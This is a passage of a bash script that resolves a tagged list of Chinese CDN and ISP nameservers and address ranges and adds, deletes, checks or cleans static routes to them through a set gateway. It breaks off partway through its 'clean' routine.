ns4.qhcdn.com
ns5.qhcdn.com
ns4.lbs.keniub.com
ns5.lbs.keniub.com
# TAG: cdnudns
ns1.cdnudns.com
ns2.cdnudns.com
ns3.cdnudns.com
ns4.cdnudns.com
# TAG: 7k7k.com, TestBy flash.7k7k.com
ns1.dnsv5.com
ns2.dnsv5.com
ns3.dnsv5.com
ns4.dnsv5.com
# TAG: bitautotech, 易车网
ns.bitautotech.com
ns5.bitautotech.com
ns8.bitautotech.com
ns7.bitautotech.com
# TAG: verycdn
183.60.42.126
220.170.193.203
218.205.72.133
121.9.213.152
58.51.95.122
58.253.211.37
59.151.30.18
59.45.79.34
111.13.125.151
112.21.182.4
112.65.227.196
124.128.20.102
222.140.154.137
221.204.173.206
183.203.21.76
58.215.241.24
183.232.66.233
220.167.100.213
211.151.81.135
123.129.249.141
ns1.veryns.com
ns3.veryns.com
ns4.veryns.com
ns7.veryns.com
ns8.veryns.com
ns1.ugametool.com
ns2.ugametool.com
# TAG: baidu
dns.baidu.com
ns2.baidu.com
ns3.baidu.com
ns4.baidu.com
ns7.baidu.com
ns1.a.shifen.com
ns2.a.shifen.com
ns3.a.shifen.com
ns4.a.shifen.com
ns5.a.shifen.com
ns1.n.shifen.com
ns2.n.shifen.com
ns3.n.shifen.com
ns4.n.shifen.com
ns5.n.shifen.com
# TAG: baidu-AS 38365
119.75.208.0/20
180.76.16.0/21
# TAG: CCTV-AS 55957
202.108.2.128/25
202.108.8.0/23
202.108.16.0/23
202.108.36.128/25
202.108.39.0/24
# TAG: cntv
gtm01.cctvcdn.net
gtm02.cctvcdn.net
gtm03.cctvcdn.net
# TAG: dnspod
a.dnspod.com
b.dnspod.com
c.dnspod.com
f1g1ns1.dnspod.net
f1g1ns2.dnspod.net
# f1g1ns3.dnspod.net
# f1g1ns4.dnspod.net
f1g2ns1.dnspod.net
f2g1ns1.dnspod.net
f2y1dns1.dnspod.net
f2y1dns2.dnspod.net
namerich1.dnspod.net
namerich2.dnspod.net
ns1.dnspod.com
ns2.dnspod.com
ns3.dnspod.com
ns4.dnspod.com
ns1.dnspod.net
ns2.dnspod.net
ns3.dnspod.net
ns4.dnspod.net
ns5.dnspod.net
ns6.dnspod.net
# for 51vv.com
ns1.dnsv2.com
ns2.dnsv2.com
ns1.dnsv3.com
ns2.dnsv3.com
ns1.dnsv4.com
ns2.dnsv4.com
ns1.dnsv5.com
ns2.dnsv5.com
ns3.dnsv2.com
ns4.dnsv2.com
ns3.dnsv3.com
ns4.dnsv3.com
ns3.dnsv4.com
ns4.dnsv4.com
ns3.dnsv5.com
ns4.dnsv5.com
182.140.167.128/25
125.39.213.128/25
115.236.151.128/25
183.60.57.128/25
180.153.10.128/25
ns1.mydnspod.com
ns2.mydnspod.com
# TAG: dopool.com, doplive.com
ns1.doplive.cn
ns2.doplive.cn
ns1.doplive.com
ns2.doplive.com
# TAG: hao123
ns1.jomodns.com
ns2.jomodns.com
ns3.jomodns.com
ns4.jomodns.com
ns5.jomodns.com
ns6.jomodns.com
ns7.jomodns.com
# TAG: imgo.tv
htns1.hifly.mobi
htns2.hifly.mobi
# TAG: iqiyi.com
ns1.iqiyi.com
ns2.iqiyi.com
ns3.iqiyi.com
ns4.iqiyi.com
ns5.iqiyi.com
ns6.iqiyi.com
202.108.14.0/24
220.181.74.0/24
# TAG: jd.com
ns1.jd.com
ns2.jd.com
ns3.jd.com
ns4.jd.com
ns1.jdcache.com
ns2.jdcache.com
ns3.jdcache.com
ns4.jdcache.com
ns.jdemall.com
ns1.jdemall.com
122.192.30.211
# TAG: kugou.com
ns.kugou.net
ns1.kugou.net
ns2.kugou.net
ns3.kugou.net
ns4.kugou.net
ns5.kugou.net
ns6.kugou.net
ns7.kugou.net
ns8.kugou.net
ns9.kugou.net
ns10.kugou.net
TAG: kuwo.cn
ns1.koowo.com
ns2.koowo.com
ns3.koowo.com
ns4.koowo.com
# TAG: gitv.tv
ns1.ptqy.gitv.tv
ns2.ptqy.gitv.tv
ns3.ptqy.gitv.tv
ns4.ptqy.gitv.tv
ns1.c002.ottcn.com
ns2.c002.ottcn.com
ns3.c002.ottcn.com
ns4.c002.ottcn.com
ns1.ppstream.com
ns2.ppstream.com
ns3.ppstream.com
ns4.ppstream.com
106.38.235.227
106.38.235.228
61.135.177.195
61.135.177.196
# TAG: ShiJieYunTian
60.28.235.110
# TAG: yygslb.com
ns1.yygslb.com
ns2.yygslb.com
ns3.yygslb.com
ns4.yygslb.com
ns5.yygslb.com
ns6.yygslb.com
ns1.tbgslb.com
ns2.tbgslb.com
ns3.tbgslb.com
ns4.tbgslb.com
# TAG: scsdns.com
ns1.scsdns.com
ns2.scsdns.com
ns4.scsdns.com
ns6.scsdns.com
# TAG: letv
ns1.leletv.com # 123.126.33.193
ns2.leletv.com # 60.28.199.199
ns3.leletv.com # 220.181.153.119
ns4.leletv.com
ns5.leletv.com
ns6.leletv.com
ns7.letvcdn.com
ns8.letvcdn.com
ns1.letvcloud.com
ns2.letvcloud.com
ns1.letvgslb.com
ns2.letvgslb.com
ns7.letvimg.com
ns8.letvimg.com
ns1.letvstore.com
ns2.letvstore.com
120.52.40.98
14.152.52.77
124.95.176.54
183.131.24.19
222.184.96.46
123.138.84.137
182.118.127.41
120.52.40.97
106.38.226.73
106.38.226.74
111.206.210.90
111.206.210.91
107.155.49.64
65.255.32.176
107.155.56.64
# forward letvgslb.com to following 2 DNSs
123.125.89.132
220.181.117.92
# TAG: pconline
ns.pc.com.cn
ns2.pc.com.cn
# TAG: qingcdn
# v6.pstatp.com
125.39.7.140
218.92.225.204
14.215.106.4
222.133.239.200
114.114.116.138
1.193.152.70
14.18.201.81
23.248.160.251
36.248.9.18
42.202.143.73
42.247.12.197
58.218.206.10
58.222.16.23
58.252.187.174
58.51.95.181
59.46.7.41
59.53.70.198
59.56.18.209
60.221.222.10
61.136.118.107
61.156.196.70
61.190.149.196
106.38.238.57
107.155.29.130
110.53.182.78
111.1.61.178
111.12.13.162
111.23.12.40
111.40.216.74
111.47.198.137
111.62.5.13
111.7.175.135
112.25.85.9
112.253.2.211
112.29.134.75
112.5.61.115
113.207.31.208
113.207.37.131
113.229.252.20
113.6.235.243
113.6.248.75
114.54.2.138
114.80.216.202
115.231.223.11
116.114.17.101
116.55.253.141
117.131.199.67
117.135.199.242
117.139.22.76
117.169.17.205
117.23.1.17
117.23.59.51
118.123.12.205
119.254.210.112
119.84.53.202
120.41.38.70
122.188.107.12
122.70.129.50
123.132.254.201
123.138.255.132
123.159.203.10
123.159.203.7
123.59.102.18
124.126.250.69
124.14.10.99
124.239.189.8
125.39.59.20
125.64.98.17
125.90.58.142
139.209.92.72
150.138.141.86
153.36.201.18
161.202.38.26
163.177.115.100
171.15.197.95
182.118.9.2
183.131.160.178
183.131.64.216
183.2.219.210
183.203.28.121
183.232.237.3
183.61.63.115
218.60.32.77
218.61.21.202
218.65.177.15
218.92.225.201
220.170.181.136
220.194.215.143
221.180.136.198
221.204.210.203
222.161.223.148
222.175.136.91
222.186.137.228
222.222.192.70
223.99.236.180
# TAG: pptv_or_pplive
dns1.pplive.com
dns5.pplive.com
dns6.pplive.com
dns11.pplive.com
dns12.pplive.com
ns1.myxns.com.cn
ns2.myxns.com.cn
ns3.myxns.com.cn
ns4.myxns.com.cn
lv4ns1.ffdns.net
lv4ns2.ffdns.net
lv4ns3.ffdns.net
lv4ns4.ffdns.net
# TAG: ruijiang-AS 38372
# FoShan RuiJiang Science and Tech Ltd.
58.249.115.0/24
112.90.48.0/23
112.90.50.0/24
112.90.52.0/24
112.90.55.0/24
112.90.60.0/23
112.90.177.0/24
112.90.178.0/23
112.90.180.0/23
113.105.223.0/24
113.106.17.0/24
113.107.201.0/24
113.107.232.0/23
113.107.234.0/24
116.28.63.0/24
116.28.64.0/23
119.120.92.0/24
119.145.147.0/24
119.145.254.0/24
121.9.215.0/24
121.9.235.0/24
121.9.243.0/24
121.9.249.0/24
121.10.246.0/23
121.201.0.0/17
122.13.176.0/23
125.90.192.0/23
125.90.194.0/24
125.90.196.0/23
163.177.161.0/24
163.177.179.0/24
163.177.180.0/23
163.177.182.0/24
183.60.40.0/23
183.60.42.0/24
183.60.44.0/24
183.60.46.0/23
183.61.70.0/24
183.61.83.0/24
# TAG: xunlei
ns1.xunlei.net
ns2.xunlei.net
ns3.xunlei.net
ns4.xunlei.net
ns11.xunlei.net
ns22.xunlei.net
123.59.127.10
58.254.134.151
182.118.18.15
58.61.39.231
58.220.12.33
42.51.169.114
42.51.169.127
120.132.88.186
123.59.33.193
123.59.127.74
123.59.127.75
123.59.127.73
# TAG: sina
# small files' routing, from ZhuoQing
58.63.236.199
58.63.236.210
58.63.236.134
61.172.201.114
61.172.201.150
123.125.104.88
123.126.57.64
123.126.42.241
123.126.57.122
114.80.223.13
ns1.sina.com
ns2.sina.com
ns3.sina.com
ns4.sina.com
ns1.sina.com.cn
ns2.sina.com.cn
ns3.sina.com.cn
ns4.sina.com.cn
ns3.kunlunle.com
ns4.kunlunle.com
ns5.kunlunle.com
ns3.alikunlun.net
ns4.alikunlun.net
ns5.alikunlun.net
ns3.kunlunpi.com
ns4.kunlunpi.com
ns5.kunlunpi.com
ns3.kunlunno.com
ns4.kunlunno.com
ns5.kunlunno.com
ns3.kunlunea.com
ns4.kunlunea.com
ns5.kunlunea.com
ns1.sinaedge.com
ns2.sinaedge.com
ns3.sinaedge.com
ns4.sinaedge.com
ns5.sinaedge.com
ns4.kunlunca.com
# TAG: sohu, to BJ-DXT 118.244.253.0/25
# domains is here:
# 17173.com
# chinaren.com
# focus.cn
# go2map.com
# itc.cn
# sohu.com
# sogou.com
# sohu.com.cn
# sohu.net
# sohu.org
# ad-plus.cn
ns.sohu.cm
dns.sohu.com
ns1.sohu.com
ns2.sohu.com
ns3.sohu.com
ns4.sohu.com
ns5.sohu.com
ns6.sohu.com
ns7.sohu.com
ns8.sohu.com
ns1.sogou.com
ns2.sogou.com
ns1.sohu-inc.com
ns2.sohu-inc.com
dns.sohu-inc.com
dns1.sohu-inc.com
ns1.sohucs.com
ns2.sohucs.com
ns3.sohucs.com
ns4.sohucs.com
ns5.sohucs.com
ns6.sohucs.com
ns7.sohucs.com
ns8.sohucs.com
ns1.sohuns.com
ns2.sohuns.com
w.a.sohu.com
s.a.sohu.com
k.a.sohu.com
v.a.sohu.com
x.a.sohu.com
y.a.sohu.com
z.a.sohu.com
ns1.e.sohu.com
ns2.e.sohu.com
# TAG: tencent
ns-os1.qq.com
ns-cmn1.qq.com
ns-cdn1.qq.com
ns-cdn2.qq.com
ns-edu1.qq.com
ns-edu2.qq.com
ns-cnc1.qq.com
ns-cnc2.qq.com
ns-tel1.qq.com
ns-tel2.qq.com
ns1.qq.com
ns2.qq.com
ns3.qq.com
ns4.qq.com
60.28.1.75 # ns4.qq.com 2001:470:20::2 才能解析到此地址
ns-open1.qq.com
ns-open2.qq.com
ns-open3.qq.com
ns114.qq.com
119.29.29.0/24
119.28.28.0/24
# TAG: tencent-AS 45090
# show route receive-protocol bgp 182.254.15.253
# show route receive-protocol bgp 220.112.88.133
182.254.0.0/16
203.195.128.0/17
203.205.128.0/17
# TAG: tudou
ns1.tudoudns.com
ns2.tudoudns.com
ns3.tudoudns.com
ns4.tudoudns.com
# TAG: shijieyuntian
dns1.vdndc.com
dns2.vdndc.com
dns3.vdndc.com
dns4.vdndc.com
dns5.vdndc.com
dns6.vdndc.com
# TAG: youku
ns1.youku.com
ns2.youku.com
ns3.youku.com
ns4.youku.com
# TAG: DouYu
119.90.48.99
119.90.48.98
124.14.7.243
##### IP address routes #####
# TAG: AS-9819
1.93.0.0/16
14.103.0.0/16
14.130.0.0/15
14.196.0.0/15
27.106.128.0/18
36.248.244.0/23
42.196.0.0/14
49.210.0.0/15
49.220.0.0/14
58.22.135.0/24
58.22.151.0/24
58.67.136.0/23
58.67.140.0/22
58.67.144.0/21
58.67.152.0/22
58.251.146.0/23
58.253.87.128/27
58.253.87.160/27
58.253.87.224/27
58.253.94.128/26
58.253.94.192/26
59.111.16.0/22
59.111.20.0/24
60.194.0.0/15
60.206.0.0/15
60.253.128.0/17
61.4.82.0/23
61.55.190.0/25
72.52.151.72/29
72.52.151.128/25
101.38.0.0/15
101.40.0.0/15
101.44.0.0/14
101.104.0.0/14
101.126.0.0/16
101.130.0.0/15
101.232.0.0/16
101.244.0.0/14
103.23.56.0/22
103.230.56.0/22
110.249.166.128/26
112.90.89.0/24
112.90.219.128/25
112.90.222.0/25
112.91.91.0/24
112.91.92.0/24
112.91.94.0/24
112.95.136.0/23
113.44.0.0/14
113.57.135.32/28
114.66.4.160/28
114.66.195.0/24
114.112.37.128/25
114.112.192.0/21
114.112.194.0/28
114.112.200.0/27
114.112.200.64/27
114.112.200.128/27
114.112.202.0/24
114.112.220.0/22
115.47.0.0/16
115.172.0.0/14
115.181.128.0/26
115.182.0.0/15
115.190.0.0/15
116.204.64.0/18
116.205.0.0/17
116.205.128.0/18
116.218.0.0/19
116.218.128.0/18
116.242.0.0/15
117.75.0.0/17
118.28.0.0/15
118.144.0.0/16
118.145.0.0/19
118.147.0.0/16
118.186.194.0/23
118.186.198.0/23
118.186.245.192/26
118.192.32.0/21
118.195.65.0/24
118.195.66.0/24
118.195.128.0/21
118.196.0.0/14
118.205.128.0/17
118.206.0.0/15
118.228.148.0/23
118.244.0.0/16
118.246.0.0/15
119.6.72.0/23
119.57.28.0/24
119.59.128.0/17
119.78.0.0/23
119.79.0.0/16
119.97.178.32/28
119.97.178.56/29
119.97.183.128/25
120.64.244.0/24
120.65.32.0/19
120.65.88.0/21
120.87.39.0/24
121.37.24.0/21
121.37.32.0/21
121.41.240.0/21
121.68.0.0/15
121.251.53.0/24
122.49.0.0/18
123.98.0.0/16
123.138.38.0/24
123.139.156.224/28
123.147.250.128/25
123.147.251.128/25
123.196.112.0/20
123.197.128.0/17
124.14.0.0/15
124.16.76.0/22
124.16.84.0/22
124.16.88.0/22
124.16.96.0/23
124.16.128.192/26
124.16.248.0/22
124.16.252.0/22
124.17.34.0/23
124.42.128.0/18
124.172.168.0/22
124.172.172.0/24
124.172.174.0/23
124.172.176.0/24
124.172.177.0/24
124.174.0.0/15
124.192.0.0/15
124.200.0.0/15
124.202.0.0/16
124.203.128.0/17
124.204.0.0/14
124.243.212.0/22
124.254.0.0/18
125.39.34.0/23
125.39.66.128/27
125.39.66.160/28
125.39.68.64/26
125.39.68.128/27
125.39.68.176/28
125.39.68.192/27
125.39.68.224/28
125.39.143.32/28
159.226.110.0/23
159.226.112.0/24
159.226.115.0/24
159.226.117.0/25
159.226.165.0/24
168.160.249.0/24
168.160.250.0/23
168.160.254.0/24
175.188.0.0/14
180.86.0.0/16
180.88.0.0/14
182.50.0.0/22
182.242.192.0/19
198.76.196.0/24
202.4.252.0/22
202.14.235.0/24
202.14.236.0/23
202.14.238.0/24
202.38.152.0/23
202.91.128.0/22
202.99.0.0/23
202.99.58.0/24
202.106.102.192/27
202.106.160.0/21
202.130.0.0/19
203.26.161.0/24
203.86.24.0/21
203.88.216.0/23
203.158.16.0/21
203.207.64.0/19
203.207.112.0/20
203.207.128.0/18
203.207.192.0/21
203.207.208.0/20
203.207.224.0/19
206.219.44.0/23
206.219.52.0/23
210.51.168.128/28
210.72.26.0/23
210.73.0.0/20
210.74.0.0/19
210.74.188.0/22
210.75.96.0/19
210.76.96.0/19
210.76.192.0/22
210.76.197.0/24
210.76.198.0/23
210.76.202.0/24
210.76.206.0/23
210.76.208.0/23
210.76.210.0/24
210.76.212.0/22
210.76.216.0/22
210.77.2.0/23
210.77.4.0/22
210.77.8.0/21
210.77.22.0/23
210.77.24.0/22
210.77.31.0/24
210.78.32.0/20
210.79.64.0/18
211.100.224.0/19
211.101.0.0/18
211.103.128.0/17
211.147.0.0/19
211.148.64.0/18
211.149.32.0/19
211.149.64.0/19
211.154.160.0/20
211.155.128.0/19
211.155.240.0/20
211.161.0.0/16
211.162.0.0/16
211.167.224.0/19
218.5.96.0/23
218.241.0.0/19
218.241.128.0/17
218.244.224.0/19
218.247.0.0/19
218.247.128.0/17
218.249.0.0/16
219.234.0.0/21
219.234.80.0/20
219.234.128.0/17
219.238.0.0/15
220.112.0.0/14
220.152.128.0/17
220.181.42.224/27
220.231.128.0/20
223.20.0.0/15
223.192.0.0/16
223.208.0.0/14
223.255.0.0/17
# TAG: other addresses
211.161.192.0/18
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
211.161.159.0/24 # Wuhan
211.162.62.0/24 # GuangZhou, cutv
211.162.78.1 # ShenZhen
211.162.79.1 # ShenZhen
# BeiJing DNS
123.151.133.161
123.151.133.162
124.207.160.106
124.207.236.26
124.207.241.236
211.167.230.0/24
211.167.240.242
211.167.241.236
# Ajkdns
180.153.87.55
115.159.231.156
114.80.230.214
58.247.138.69
115.159.231.157
115.159.231.151
# TAG: sjhl, 世纪互联
# 世纪互联AS: 9308 9802 17428
58.83.128.0/17
59.151.0.0/17
60.28.192.0/19
60.29.240.0/20
120.135.16.0/20
120.135.32.0/19
120.135.64.0/18
125.39.24.0/22
125.39.92.0/22
125.39.164.0/22
125.39.188.0/22
125.39.192.0/22
125.39.216.0/22
125.39.220.0/22
125.39.232.0/22
203.196.0.0/22
203.196.4.0/24
210.77.128.0/18
211.99.160.0/21
211.99.168.0/22
211.99.178.0/24
211.99.183.0/24
211.99.188.0/22
211.99.192.0/19
211.151.0.0/16
211.152.0.0/19
211.152.96.0/19
# TAG: OTHERS
ns1.qingcdn.com
ns2.qingcdn.com
ns3.qingcdn.com
123.134.184.141
ns1.ialloc.com
ns2.ialloc.com
dns1.ourdvs.org
dns2.ourdvs.info
dns3.ourdvs.org
dns4.ourdvs.info
dns5.ourdvs.org
dns1.ourwebcdn.org
dns2.ourwebcdn.info
dns3.ourwebcdn.org
dns4.ourwebcdn.info
dns5.ourwebcdn.org
ns1.ourwebpic.info
ns2.ourwebpic.info
ns3.ourwebpic.info
ns4.ourwebpic.info
ns5.ourwebpic.info
dns1.ourwebpic.info
dns2.ourwebpic.info
dns3.ourwebpic.info
dns4.ourwebpic.info
dns5.ourwebpic.info
ns3.kunlungr.com
ns4.kunlungr.com
ns5.kunlungr.com
ns1.mmycdn.com
ns2.mmycdn.com
ns3.mmycdn.com
ns6.qh-lb.com
ns5.qh-lb.com
ns4.qh-lb.com
ns3.qh-lb.com
ns2.qh-lb.com
119.188.67.105
220.181.126.35
123.125.80.86
220.181.159.184
42.51.169.137
# TAG: NEWIPS
dns2.ourdvs.info
dns4.ourdvs.info
114.80.230.197
157.0.164.12
119.188.4.14.53
219.141.140.10
ns1-live.00cdn.com
ns2-live.00cdn.com
ns3-live.00cdn.com
ns4-live.00cdn.com
dns1.ourdvs.org
dns2.ourdvs.org
dns3.ourdvs.org
dns4.ourdvs.org
dns5.ourdvs.org
ns1.vcloudgtm.com
ns2.vcloudgtm.com
124.251.21.94
221.130.200.169
223.111.17.109
183.134.55.10
116.211.125.79
42.236.41.9
219.141.136.10
180.153.199.214
111.161.99.130
219.141.140.10
117.149.37.143
117.149.37.144
27.221.106.6
27.221.106.1
27.221.106.5
49.79.232.213
14.119.124.110
14.119.124.91
221.236.174.81
218.92.152.169
14.29.41.26
61.164.244.213
111.161.65.233
118.192.132.79
58.211.21.41
42.236.123.142
221.13.157.138
123.134.184.140
"
arping_check() {
# skip check while testing
case $MY_GW in
$GW_test) return 0
esac
# start detect
if arping -I $NIC -c 1 -q $MY_GW; then
true
else
echo_red "arping $MY_GW failed, exit now"
exit 2
fi
}
# Color define
OFF=$'\e[0m'
CYAN_BOLD=$'\033[1;36m'
GREEN_BOLD=$'\e[1;32m'
MAGENTA_BOLD=$'\033[1;35m'
RED_BOLD=$'\e[1;31m'
YELLOW_BOLD=$'\e[1;33m'
OFF=$'\e[0m'
echo_ok_end() {
echo -e "${GREEN_BOLD}ok${OFF}"
}
echo_fail_end() {
echo -e "${RED_BOLD}failed${OFF}"
}
echo_green() {
echo -e "${GREEN_BOLD}$@${OFF}"
}
echo_red() {
echo -e "${RED_BOLD}$@${OFF}"
}
echo_yellow() {
echo -e "${YELLOW_BOLD}$@${OFF}"
}
echo_already_did() {
if [ x$echo_already_did_opts == "x-v" ]; then
echo -ne "${YELLOW_BOLD}already did${OFF}\r\e[K\e[0m"
else
echo_yellow "already did"
fi
}
log() {
[[ $LOG ]] || LOG=$( realpath $0.log )
echo "`date +%F\ %T` $@" >> $LOG
}
manual() {
if [ $MANUAL_MODE -eq 1 ]; then
return 0
elif [ $MANUAL_MODE -eq 0 ]; then
return 1
else
echo_yellow "Invalid MANUAL_MODE value: $MANUAL_MODE"
fi
}
resolvename() {
[[ $1 ]] && local NAME=$1
local R=`dig @"$MYDNS" +short +time=2 $NAME 2>/dev/null | sort`
if grep -q ';; connection timed out; no servers could be reached' <<< "$R"; then
return 1
else
echo -n "$R"
return 0
fi
}
yes_or_no() {
while read ANSWER; do
case $ANSWER in
[yY][eE][sS])
return 0;;
[nN][oO])
return 1;;
quit)
exit 1;;
*)
echo -n "I don't understand, (yes/no/quit) "
continue
esac
done
return 0
}
print_help() {
echo "Usage: $0 [-v] {add|del|check|clean} {TAG|all}"
echo "In Gentoo, I can start/stop automatically while named with .start/.stop appended. eg: ${0}.start"
echo "TAG is partial matched and case sensitive, available TAGs are:"
grep ^"# TAG:" <<< "$ADDRESS_LIST_ALL" | sed -e 's/^# TAG:/ /' -e '/^#/d'
exit 1
}
get_my_ip() {
ip -4 addr show dev $NIC | \
awk '/^ inet / && ( \
/'$IP_dns1'\// || \
/'$IP_dns2'\// || \
/'$IP_dns3'\// || \
/'$IP_dns4'\// || \
/'$IP_dns5'\// || \
/'$IP_dns6'\// || \
/'$IP_dns7'\// || \
/'$IP_dns8'\// || \
/'$IP_ns1'\// || \
/'$IP_ns2'\// || \
/'$IP_ns5'\// || \
/'$IP_ns6'\// || \
/'$IP_ns7'\// || \
/'$IP_ns8'\// || \
/'$IP_yd1'\// || \
/'$IP_yd2'\// || \
/'$IP_yd3'\// || \
/'$IP_yd4'\// || \
/'$IP_re1'\// || \
/'$IP_re2'\// || \
/'$IP_re3'\// || \
/'$IP_re4'\// || \
/'$IP_test'\// \
) {print $2}' | \
sed -e 's/\/..$//'
}
is_ip_address() {
[[ $1 ]] || return 2
case $1 in
[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*)
return 0;;
*)
return 1
esac
}
is_legal_line() {
# Abtain variables from parent: dst_addr trash1
# Don't accept empty line
[[ $dst_addr ]] || return 1
# Show TAG
case $trash1 in
TAG:*)
# Don't print TAG while 'clean'.
if [ x$ACTION == xclean ]; then
true
else
manual && echo -e "\n${CYAN_BOLD}${trash1}${OFF}"
return 1
fi
;;
esac
# Don't accept comment line
case $dst_addr in
"#"*) return 1;;
*\.*) return 0
esac
}
in_routing_table() {
local dst_ip=$1
if ip route list | grep -q ^"$dst_ip via $MY_GW "; then
return 0
else
return 1
fi
}
_ip_route_() {
local dst_ip=$1
if [[ $2 ]] && [ x"$2" == "xIS_IP_FLAG" ]; then
local EXTRA_MSG=
else
local EXTRA_MSG="=> $dst_ip "
fi
manual && echo -n "${ACTION}ing: ${dst_addr} ${EXTRA_MSG:+$EXTRA_MSG}"
# Filter out NXDOMAIN pointed IP
if grep -q ^"$dst_ip"$ <<< "$NXIP"; then
echo_red "bad IP, NXDOMAIN redirected"
return 1
fi
case $ACTION in
add)
in_routing_table $dst_ip && {
manual && echo_already_did
return 0
}
;;
del)
in_routing_table $dst_ip || {
manual && echo_red "${RED_BOLD}not in routing table${OFF}"
return 1
}
;;
*)
echo_red "not supported ACTION: ${ACTION}"
return 1
esac
if ip route $ACTION $dst_ip via $MY_GW dev $NIC; then
log "$ACTION: $dst_addr "$EXTRA_MSG
manual && echo_ok_end
return 0
else
log "$ACTION failed: $dst_addr"$EXTRA_MSG
manual && echo_fail_end
return 1
fi
}
change_route() {
if [[ $ADDRESS_LIST ]]; then
true
else
manual && \
echo_red "ADDRESS_LIST is empty, exit now." || \
log "ADDRESS_LIST is empty"
exit 127
fi
local dst_addr trash1
while read dst_addr trash1; do
is_legal_line && true || continue
# IP直接加, 域名先解析成IP再加
if is_ip_address $dst_addr; then
_ip_route_ $dst_addr IS_IP_FLAG
else
IPs=`resolvename $dst_addr`
[[ $IPs ]] || {
manual && echo -n "${ACTION}ing: ${dst_addr} ${EXTRA_MSG:+$EXTRA_MSG}"
manual && echo "${RED_BOLD}resolution failed${OFF}"
continue
}
for dst_ip in $IPs; do
if is_ip_address $dst_ip; then
_ip_route_ $dst_ip
else
manual && \
echo "${RED_BOLD}Invalid IP detected, maybe CNAMEed NS${OFF}: "$dst_ip || \
log "Invalid IP detected, maybe CNAMEed NS: $dst_ip"
fi
done
fi
done <<< "$ADDRESS_LIST"
}
# Determine my enviroment.
case `get_my_ip` in
$IP_dns1) MY_IP=$IP_dns1; MY_GW=$GW_dns1;;
$IP_dns2) MY_IP=$IP_dns2; MY_GW=$GW_dns2;;
$IP_dns3) MY_IP=$IP_dns3; MY_GW=$GW_dns3;;
$IP_dns4) MY_IP=$IP_dns4; MY_GW=$GW_dns4;;
$IP_dns5) MY_IP=$IP_dns5; MY_GW=$GW_dns5;;
$IP_dns6) MY_IP=$IP_dns6; MY_GW=$GW_dns6;;
$IP_dns7) MY_IP=$IP_dns7; MY_GW=$GW_dns7;;
$IP_dns8) MY_IP=$IP_dns8; MY_GW=$GW_dns8;;
$IP_ns1) MY_IP=$IP_ns1; MY_GW=$GW_ns1;;
$IP_ns2) MY_IP=$IP_ns2; MY_GW=$GW_ns2;;
$IP_ns5) MY_IP=$IP_ns5; MY_GW=$GW_ns5;;
$IP_ns6) MY_IP=$IP_ns6; MY_GW=$GW_ns6;;
$IP_ns7) MY_IP=$IP_ns6; MY_GW=$GW_ns6;;
$IP_ns8) MY_IP=$IP_ns6; MY_GW=$GW_ns6;;
$IP_yd1) MY_IP=$IP_yd1; MY_GW=$GW_yd1;;
$IP_yd2) MY_IP=$IP_yd2; MY_GW=$GW_yd2;;
$IP_yd3) MY_IP=$IP_yd3; MY_GW=$GW_yd3;;
$IP_yd4) MY_IP=$IP_yd4; MY_GW=$GW_yd4;;
$IP_re1) MY_IP=$IP_re1; MY_GW=$GW_re1;;
$IP_re2) MY_IP=$IP_re2; MY_GW=$GW_re2;;
$IP_re3) MY_IP=$IP_re3; MY_GW=$GW_re3;;
$IP_re4) MY_IP=$IP_re4; MY_GW=$GW_re4;;
$IP_test)
MY_IP=$IP_test
MY_GW=$GW_test
# Mask DNS IPs I will use later in test enviroment.
ADDRESS_LIST_ALL="$( sed \
-e '/211.161.192./d' \
-e '/211.161./d' <<< "$ADDRESS_LIST_ALL" )"
;;
*)
cat <<EOF
This script is not suitable for this server ...
For testing purpose, please execute below command on your local host:
ip addr add 1.1.1.1/30 dev $NIC
EOF
exit 0
esac
# Name it with '.start|.stop' appended will lead to add/del route & exit.
case $0 in
*.start)
ACTION="add"
ADDRESS_LIST="$ADDRESS_LIST_ALL"
LOG=$( realpath $0 ).log
MANUAL_MODE=0
change_route
exit 0
;;
*.stop)
ACTION="del"
ADDRESS_LIST="$ADDRESS_LIST_ALL"
LOG=$( realpath $0 ).log
MANUAL_MODE=0
change_route
exit 0
;;
*)
true
esac
# check arguments
[[ $1 ]] && [[ $2 ]] || print_help
# check gateway, exit if detect failed
if which arping &>/dev/null; then
arping_check
else
echo_red "command not found, check skipped: arping"
fi
# Determine if show "already did" message
case $1 in
-v)
echo_already_did_opts=""
shift
;;
*)
echo_already_did_opts="-v"
esac
# Determine address-list section to operate.
case $2 in
all)
ADDRESS_LIST="$ADDRESS_LIST_ALL"
;;
*/*)
# sed can not match '/' here, so baned.
echo_yellow "You can't use '/' in TAG name :("
echo
print_help
;;
*)
ADDRESS_LIST=$( sed -ne '/TAG: '$2'/,/^$/p' <<< "$ADDRESS_LIST_ALL" )
if [[ $ADDRESS_LIST ]]; then
true
else
echo "${RED_BOLD}TAG invalid${OFF}: $2"
echo
print_help
fi
esac
# Determine action to take.
case $1 in
del)
ACTION="del"
change_route
;;
add)
ACTION="add"
change_route
;;
check)
ACTION="check"
while read dst_addr trash1; do
is_legal_line && true || continue
if is_ip_address $dst_addr; then
IS_IP_FLAG=1
IPs=$dst_addr
else
IS_IP_FLAG=0
IPs=`resolvename $dst_addr`
fi
# show failed resolution
if ! [[ $IPs ]]; then
echo -en "${YELLOW_BOLD}*${OFF} "
echo -n $dst_addr
echo_red " resolution failed"
fi
for dst_ip in $IPs; do
# check if the address in routing table
if in_routing_table $dst_ip; then
echo -en "${GREEN_BOLD}+${OFF} "
else
echo -en "${RED_BOLD}-${OFF} "
fi
# print message
if [ $IS_IP_FLAG -eq 1 ]; then
echo $dst_addr
elif [ $IS_IP_FLAG -eq 0 ]; then
echo "$dst_addr => "$dst_ip
else
echo_red "Unexpected error detected"
fi
done
done <<< "$ADDRESS_LIST"
echo "(${GREEN_BOLD}+${OFF}) in head means this IP lives in routing table, (${RED_BOLD}-${OFF}) not in."
;;
clean)
ACTION="clean"
ADDRESS_LIST="$ADDRESS_LIST_ALL"
# clean by TAG is not possible now, so just clean all
ROUTE_TABLE=$( ip route list all )
strip_from_table() {
local dst_ip=$1
if [[ $dst_ip ]] && is_ip_address $dst_ip; then
in_routing_table $dst_ip && ROUTE_TABLE=$( grep -v ^"$dst_ip via $MY_GW " <<< "$ROUTE_TABLE" )
else
echo "${RED_BOLD}Error in $FUNCNAME while cleaning${OFF}: $dst_addr"
fi
}
CNT_ALL=$( echo "$ADDRESS_LIST" | wc -l )
CNT=1
while read dst_addr trash1; do
is_legal_line && true || continue
if is_ip_address $dst_addr; then
dst_ip=$dst_addr
strip_from_table $dst_ip
else
